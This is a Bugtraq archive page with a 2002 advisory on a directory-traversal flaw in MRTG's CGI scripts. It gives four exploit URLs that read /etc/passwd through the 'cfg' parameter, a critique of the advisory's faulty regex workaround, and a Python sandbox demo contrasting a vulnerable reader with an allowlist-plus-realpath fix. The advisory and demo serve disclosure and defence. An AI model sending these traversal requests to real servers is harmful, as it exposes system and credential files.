Bugtraq
mailing list archives
new advisory
From: "UkR-XblP?" <cuctema () ok ru>
Date: Sat, 02 Feb 2002 04:47:29 +0300
---=== UkR Security Team advisory ===---
Name : MRTG CGI script "show files" Vulnerability
About : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network links. MRTG generates HTML pages containing GIF images which provide a live visual representation of this traffic.
Product vendor: MRTG / http://www.mrtg.org
Problem : The problem lies in incorrect validation of the browser-supplied "cfg" parameter. The scripts do not check it for directory traversal ("../"), so a crafted request can display the first line of any file on the system where the script is installed that the CGI process is able to read.
Workaround : this will help somewhat: $input =~ s/[(\.\.)|\/]//g;
Note that inside a Perl character class the parentheses and "|" are literal characters, so this substitution deletes every ".", "/", "(", ")" and "|" from the input rather than only ".." and "/". It does stop the traversal shown below, but it also mangles legitimate names such as "mrtg.cfg" (which becomes "mrtgcfg"). A proper fix restricts "cfg" to an allowlist of plain file names and verifies that the resolved path stays inside the MRTG configuration directory.
Author : UkR-XblP / UkR security team
Exploit :
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
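The following is an added example written for this archive page; it is not code from the MRTG project or from the advisory's author, and it is written in Python rather than the Perl the affected CGIs use so that it can be run directly. It builds a small constructed directory tree (a stand-in for /etc/mrtg and /etc/passwd) in a temporary directory, then shows three readers side by side: one that joins the unvalidated "cfg" value to the config directory and so reproduces the traversal described above, a transcription of the advisory's regex workaround (showing that it both blocks "../" and breaks a legitimate name), and a hardened reader that combines a file-name allowlist with a realpath containment check, which also catches a symlink planted inside the config directory. Function names, the directory layout and the file contents are all assumptions made for the demonstration.

```python
import os
import re
import tempfile

# Constructed sandbox standing in for the web host: a config directory holding
# one legitimate MRTG config, a file two levels up that must stay unreadable,
# and a symlink inside the config directory that points at that file.
ROOT = tempfile.mkdtemp(prefix="mrtg-demo-")
CFG_DIR = os.path.join(ROOT, "etc", "mrtg")
SECRET = os.path.join(ROOT, "etc", "secret")       # stand-in for /etc/passwd
os.makedirs(CFG_DIR)
with open(os.path.join(CFG_DIR, "router.cfg"), "w") as f:
    f.write("WorkDir: /var/www/mrtg\n")
with open(SECRET, "w") as f:
    f.write("root:x:0:0:root:/root:/bin/sh\n")      # constructed sample line
os.symlink(SECRET, os.path.join(CFG_DIR, "evil.cfg"))


def first_line_vulnerable(cfg):
    """Assumed model of the flaw in the advisory: the query-string value is
    joined to the config directory with no validation, so '../' walks out of
    it and the first line of an arbitrary readable file comes back."""
    path = os.path.join(CFG_DIR, cfg)
    with open(path) as f:
        return f.readline().rstrip("\n")


def advisory_workaround(cfg):
    """The advisory's Perl substitution s/[(\\.\\.)|\\/]//g transcribed to
    Python. Inside a character class '(' ')' and '|' are literals, so this
    deletes every '.', '/', '(', ')' and '|' character, not just '../'."""
    return re.sub(r"[(\.\.)|\/]", "", cfg)


# Allowlist: a plain name, no separators, ending in .cfg (an assumed policy).
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.cfg$")


def first_line_hardened(cfg):
    """Allowlist the name, then confirm the resolved path still lies inside
    CFG_DIR. The allowlist blocks separators and traversal; the realpath check
    catches symlinks and anything the allowlist did not anticipate."""
    if not SAFE_NAME.match(cfg):
        raise ValueError("rejected cfg name: %r" % cfg)
    base = os.path.realpath(CFG_DIR)
    path = os.path.realpath(os.path.join(base, cfg))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("cfg resolves outside config dir: %r" % cfg)
    with open(path) as f:
        return f.readline().rstrip("\n")


def hardened_rejects(cfg):
    """True when the hardened reader refuses the name (used by the self-check)."""
    try:
        first_line_hardened(cfg)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    traversal = "../../etc/secret"          # two levels up from CFG_DIR -> SECRET
    print("vulnerable, legit name :", first_line_vulnerable("router.cfg"))
    print("vulnerable, traversal  :", first_line_vulnerable(traversal))
    print("workaround on traversal:", advisory_workaround(traversal))
    print("workaround on legit    :", advisory_workaround("router.cfg"))
    print("hardened, legit name   :", first_line_hardened("router.cfg"))
    print("hardened rejects '..'  :", hardened_rejects(traversal))
    print("hardened rejects link  :", hardened_rejects("evil.cfg"))
```

The traversal string uses exactly two "../" because the sandbox root sits in a temporary directory; against a real install the eight-deep path from the exploit URLs behaves the same, since extra ".." segments stop at "/". The symlink case is the reason the allowlist alone is not enough: "evil.cfg" passes the name check and is only refused because realpath resolves it to a location outside the config directory.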